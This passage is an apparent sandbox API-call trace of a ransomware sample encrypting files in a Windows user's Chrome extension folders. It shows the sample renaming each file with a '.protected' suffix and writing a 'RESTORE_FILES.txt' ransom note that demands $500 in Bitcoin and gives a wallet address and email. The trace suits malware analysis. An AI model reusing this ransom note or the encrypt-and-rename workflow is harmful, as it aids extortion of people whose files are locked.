hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0081.281] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0081.281] CloseHandle (hObject=0x164) returned 1 [0081.281] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json.protected") returned 176 [0081.281] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json.protected")) returned 1 [0081.282] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0 [0081.282] FindClose (in: hFindFile=0x47bbd0 | out: hFindFile=0x47bbd0) returned 1 [0081.282] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\RESTORE_FILES.txt") returned 161 [0081.282] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0081.283] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.283] WriteFile (in: hFile=0x160, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295db84*=0x53d, lpOverlapped=0x0) returned 1 [0081.284] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.284] WriteFile (in: hFile=0x160, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295db84*=0x2ac, lpOverlapped=0x0) returned 1 [0081.284] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.284] WriteFile (in: hFile=0x160, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295db84*=0xb1, lpOverlapped=0x0) returned 1 [0081.285] CloseHandle (hObject=0x160) returned 1 [0081.285] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0 [0081.285] FindClose (in: hFindFile=0x47bb90 | out: hFindFile=0x47bb90) returned 1 [0081.285] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\RESTORE_FILES.txt") returned 151 [0081.285] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0081.286] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.286] WriteFile (in: hFile=0x15c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ddf4*=0x53d, lpOverlapped=0x0) returned 1 [0081.286] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.286] WriteFile (in: hFile=0x15c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ddf4*=0x2ac, lpOverlapped=0x0) returned 1 [0081.287] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.287] WriteFile (in: hFile=0x15c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ddf4*=0xb1, lpOverlapped=0x0) returned 1 [0081.287] CloseHandle (hObject=0x15c) returned 1 [0081.288] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0 [0081.288] FindClose (in: hFindFile=0x47bb50 | out: hFindFile=0x47bb50) returned 1 [0081.288] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\RESTORE_FILES.txt") returned 141 [0081.288] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0081.289] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.289] WriteFile (in: hFile=0x158, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e064*=0x53d, lpOverlapped=0x0) returned 1 [0081.290] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.290] WriteFile (in: hFile=0x158, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e064*=0x2ac, lpOverlapped=0x0) returned 1 [0081.290] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.290] WriteFile (in: hFile=0x158, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e064*=0xb1, lpOverlapped=0x0) returned 1 [0081.290] CloseHandle (hObject=0x158) returned 1 [0081.290] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0081.290] lstrcmpiW (lpString1="pjkljhegncpnkpknbcohdijeoejaedia", lpString2="Windows") returned -1 [0081.290] lstrcmpiW (lpString1="pjkljhegncpnkpknbcohdijeoejaedia", lpString2="Program Files") returned -1 [0081.290] lstrcmpiW (lpString1="pjkljhegncpnkpknbcohdijeoejaedia", lpString2="Program Files (x86)") returned -1 [0081.290] lstrcmpiW (lpString1="pjkljhegncpnkpknbcohdijeoejaedia", lpString2="$Recycle.bin") returned 1 [0081.290] lstrcmpiW (lpString1="pjkljhegncpnkpknbcohdijeoejaedia", lpString2="System Volume Information") returned -1 [0081.290] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia") returned 123 [0081.290] lstrcmpW (lpString1="pjkljhegncpnkpknbcohdijeoejaedia", lpString2=".") returned 1 [0081.290] lstrcmpW (lpString1="pjkljhegncpnkpknbcohdijeoejaedia", lpString2="..") returned 1 [0081.290] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\*") returned 125 [0081.290] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\*", lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0x47bb50 [0081.291] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.291] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.291] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.291] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.291] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.291] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\.") returned 125 [0081.291] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.291] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0081.291] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.291] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.291] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.291] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.291] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.291] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\..") returned 126 [0081.291] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.291] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.291] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0081.291] lstrcmpiW (lpString1="8.1_0", lpString2="Windows") returned -1 [0081.291] lstrcmpiW (lpString1="8.1_0", lpString2="Program Files") returned -1 [0081.291] lstrcmpiW (lpString1="8.1_0", lpString2="Program Files (x86)") returned -1 [0081.291] lstrcmpiW (lpString1="8.1_0", lpString2="$Recycle.bin") returned 1 [0081.291] lstrcmpiW (lpString1="8.1_0", lpString2="System Volume Information") returned -1 [0081.291] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0") returned 129 [0081.291] lstrcmpW (lpString1="8.1_0", lpString2=".") returned 1 [0081.291] lstrcmpW (lpString1="8.1_0", lpString2="..") returned 1 [0081.291] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\*") returned 131 [0081.291] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\*", lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0x47bb90 [0081.305] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.305] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.305] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.305] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.305] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.305] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\.") returned 131 [0081.305] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.305] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0081.305] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.305] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.306] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.306] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.306] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.306] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\..") returned 132 [0081.306] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.306] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.306] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0081.306] lstrcmpiW (lpString1="128.png", lpString2="Windows") returned -1 [0081.306] lstrcmpiW (lpString1="128.png", lpString2="Program Files") returned -1 [0081.306] lstrcmpiW (lpString1="128.png", lpString2="Program Files (x86)") returned -1 [0081.306] lstrcmpiW (lpString1="128.png", lpString2="$Recycle.bin") returned 1 [0081.306] lstrcmpiW (lpString1="128.png", lpString2="System Volume Information") returned -1 [0081.306] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png") returned 137 [0081.306] StrStrIW (lpFirst="128.png", lpSrch=".protected") returned 0x0 [0081.306] lstrcmpW (lpString1="128.png", lpString2="RESTORE_FILES.txt") returned -1 [0081.306] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0081.306] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0081.306] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0081.308] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png") returned 137 [0081.308] StrStrW (lpFirst="128.png", lpSrch=".txt") returned 0x0 [0081.308] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png") returned 137 [0081.308] StrStrW (lpFirst="128.png", lpSrch=".rar") returned 0x0 [0081.308] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png") returned 137 [0081.308] StrStrW (lpFirst="128.png", lpSrch=".zip") returned 0x0 [0081.308] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x180f, lpOverlapped=0x0) returned 1 [0081.316] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffe7f1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.316] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x180f, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x180f, lpOverlapped=0x0) returned 1 [0081.317] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.317] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0081.317] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0081.317] CloseHandle (hObject=0x160) returned 1 [0081.318] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png.protected") returned 147 [0081.318] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png.protected")) returned 1 